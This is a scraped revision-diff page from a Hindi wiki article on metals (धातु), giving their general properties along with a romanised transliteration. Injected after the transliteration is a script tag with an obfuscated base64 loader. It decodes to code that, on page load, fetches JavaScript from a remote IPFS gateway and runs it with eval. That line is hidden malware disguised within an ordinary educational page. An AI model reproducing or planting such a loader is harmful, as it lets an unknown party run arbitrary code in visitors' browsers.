Difference between revisions of "धातु"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Metal) सामान्यतः धातुये [[विद्युत]] की सुचालक होती है, तथा [[अम्ल|अम्लों]] से क्रिया करके [[हाइड्रोजन]] [[गैस]] विस्थापित करती है। साधारण अवस्था में पाया गेलियम व सीजियम को छोड़कर सभी धातुयें [[ठोस]] अवस्था में पायी जाती हैं। धातुओं में, तन्यता, उच्च [[ऊष्मा]] चालकता, आधातवर्धनीयता, उच्च [[वैद्युत]] चालकता उच्च तनन क्षमता, सुपट्यता आदि गुण पाये जाते हैं। धातुएं कठोर होती हैं तथा उनमें धातुई चमक पायी जाती है। पारा ऐसा धातु है जो [[द्रव]] की अवस्था में रहता है।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Metal) सामान्यतः धातुयें [[विद्युत]] की सुचालक होती है, तथा [[अम्ल|अम्लों]] से क्रिया करके [[हाइड्रोजन]] [[गैस]] विस्थापित करती है। साधारण अवस्था में पाया गेलियम व सीजियम को छोड़कर सभी धातुयें [[ठोस]] अवस्था में पायी जाती हैं। धातुओं में, तन्यता, उच्च [[ऊष्मा]] चालकता, आधातवर्धनीयता, उच्च [[वैद्युत]] चालकता उच्च तनन क्षमता, सुपट्यता आदि गुण पाये जाते हैं। धातुएं कठोर होती हैं तथा उनमें धातुई चमक पायी जाती है। पारा ऐसा धातु है जो [[द्रव]] की अवस्था में रहता है।
 
*[[अधातु]]
 
*[[अधातु]]
 
*[[उपधातु]]
 
*[[उपधातु]]
Line 16: Line 16:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{रसायन विज्ञान}}
 
{{आवर्त सारणी}}
 
{{आवर्त सारणी}}
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:17, 6 December 2011

(aangrezi:Metal) samanyatah dhatuyean vidyut ki suchalak hoti hai, tatha amloan se kriya karake haidrojan gais visthapit karati hai. sadharan avastha mean paya geliyam v sijiyam ko chho dakar sabhi dhatuyean thos avastha mean payi jati haian. dhatuoan mean, tanyata, uchch ooshma chalakata, adhatavardhaniyata, uchch vaidyut chalakata uchch tanan kshamata, supatyata adi gun paye jate haian. dhatuean kathor hoti haian tatha unamean dhatuee chamak payi jati hai. para aisa dhatu hai jo drav ki avastha mean rahata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh